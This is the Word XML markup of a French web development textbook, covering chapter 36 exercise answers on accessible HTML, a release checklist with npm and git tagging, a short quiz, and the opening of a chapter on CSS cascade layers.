          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, pas avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en style.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Annoncez le nombre de résultats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 36.3 — Préparer la livraison</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   MISE EN PRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Produisez un dossier de livraison vérifié.</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Construisez, contrôlez, versionnez.</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 xml:space="preserve">Rédigez le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>README.md</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Préparez une capture de la page d'accueil.</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36.1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&lt;main id="contenu"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;section class="heros section"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div class="conteneur"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;p class="surtitre"&gt;Saison 2026&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;h1&gt;La culture se partage&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;p class="lead"&gt;Ateliers, rencontres et spectacles ouverts à tous.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;a class="bouton" href="/programmes.html"&gt;Voir les programmes&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/section&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;section class="section" aria-labelledby="titre-programmes"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div class="conteneur"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;h2 id="titre-programmes"&gt;À venir&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;ul class="grille-programmes"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;article class="carte"&gt;…&lt;/article&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/section&gt;</w:t>
        <w:br/>
        <w:t>&lt;/main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-labelledby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relie la section à son titre, ce qui donne un nom exploitable par les technologies d'assistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La liste de cartes est une liste : le nombre d'éléments est annoncé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 36.2</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&lt;div data-filtres role="group" aria-label="Filtrer les programmes"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="button" data-filtre="tous" aria-pressed="true"&gt;Tous&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="button" data-filtre="atelier"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    aria-pressed="false"&gt;Ateliers&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="button" data-filtre="scene"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    aria-pressed="false"&gt;Spectacles&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;p data-compteur aria-live="polite"&gt;3 programmes&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-pressed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique l'état de chaque bouton ; un seul est actif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-live="polite"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fait annoncer le compteur sans interrompre la lecture en cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 36.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>npm run lint &amp;&amp; npm run test &amp;&amp; npm run build</w:t>
        <w:br/>
        <w:t>du -sh dist</w:t>
        <w:br/>
        <w:t>ls dist/assets</w:t>
        <w:br/>
        <w:br/>
        <w:t>git add .</w:t>
        <w:br/>
        <w:t>git commit -m "Livre la version 1.0 du site</w:t>
        <w:br/>
        <w:br/>
        <w:t>Trois pages, thème clair et sombre, formulaire validé.</w:t>
        <w:br/>
        <w:t>Accessibilité AA vérifiée, LCP mesuré à 1,8 s en 4G."</w:t>
        <w:br/>
        <w:t>git tag v1.0.0</w:t>
        <w:br/>
        <w:t>git push origin main --tags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le tag marque une version livrée : il permet de revenir exactement à cet état.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le message de commit résume ce qui est livré et les vérifications effectuées.</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Par quoi commence un projet web bien mené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Par le CSS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Par le cadrage du besoin et du contenu</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Par le choix d'un cadre applicatif</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Par l'hébergement</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 xml:space="preserve">Combien de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une page doit-elle contenir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 seul</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Autant que de sections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Aucun</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Au moins trois</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Comment masquer un élément filtré sans casser l'accessibilité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display: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> en style en ligne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 xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hidden</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opacity: 0</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visibility: hidden</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 vérifier avant de publier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Uniquement le rendu visuel</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HTML, accessibilité, performance, responsive, liens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Seulement la vitesse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Rien, on corrige après</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À quoi sert un tag Git de version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À accélérer les commits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À marquer un état livré et pouvoir y revenir</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À compresser le dépôt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À signer les fichiers</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Le périmètre, le public et les critères d'acceptation précèdent le code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unique décrit le sujet de la page ; les sections utilisent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retire l'élément de l'arbre d'accessibilité de façon standard.</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Cinq contrôles couvrent l'essentiel des défauts de mise en production.</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Le tag identifie précisément la version publiée dans l'historique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId62"/>
          <w:footerReference w:type="default" r:id="rId63"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE VI</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Approfondissements</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Les fonctionnalités CSS contemporaines, les composants réutilisables, le contenu multilingue et la maintenance d'un projet dans la durée.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. CSS avancé : couches, `:has()` et requêtes de conteneur · 2. Composants web et système de design · 3. Internationalisation et contenu multilingue · 4. Maintenir un site dans le temps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">37. CSS avancé : couches, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et requêtes de conteneur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Les fonctionnalités récentes qui remplacent des habitudes anciennes et simplifient les feuilles de style volumineuses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 36</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Organiser une feuille de style avec les couches de cascade.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Écrire des sélecteurs relationnels avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:has()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Adapter un composant à son conteneur, non à l'écran.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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>subgrid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour aligner des sous-grilles.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Écrire du CSS imbriqué sans reproduire les erreurs de Sass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>37.1 Le problème des feuilles de style qui vieillissent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Après quelques mois, une feuille de style accumule des correctifs : un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour passer devant un style antérieur, un sélecteur plus spécifique pour écraser le précédent, puis un second </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour repasser devant. La cascade devient une négociation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre règles pour une seule décision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La spirale de la spécificité */</w:t>
        <w:br/>
        <w:t>.bouton { background: var(--navy); }</w:t>
        <w:br/>
        <w:t>.carte .bouton { background: var(--amber); }</w:t>
        <w:br/>
        <w:t>.carte .bouton.principal { background: var(--navy) !important; }</w:t>
        <w:br/>
        <w:t>#app .carte .bouton.principal { background: var(--amber) !important; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les couches de cascade répondent à ce problème sans changer la spécificité individuelle des sélecteurs : elles établissent un ordre entre des ensembles de règles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>37.2 Les couches de cascade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclare des niveaux d'autorité. La dernière couche déclarée gagne, quelle que soit la spécificité des sélecteurs à l'intérieur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre couches, un ordre explicite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Déclaration de l'ordre : le dernier l'emporte */</w:t>
        <w:br/>
        <w:t>@layer reset, base, composants, utilitaires, surcharges;</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer reset {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *, *::before, *::after { box-sizing: border-box; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body { margin: 0; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer base {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  h1, h2, h3 { line-height: 1.15; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  a { color: var(--lien); }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer composants {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { padding: var(--espace-2); border-radius: 8px; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte a { text-decoration: none; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer utilitaires {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .texte-centre { text-align: center; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.118 — Cinq couches et leur autorité</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40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Couche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Autorité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>reset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3906"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Normalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La plus faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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base</w:t>
            </w:r>
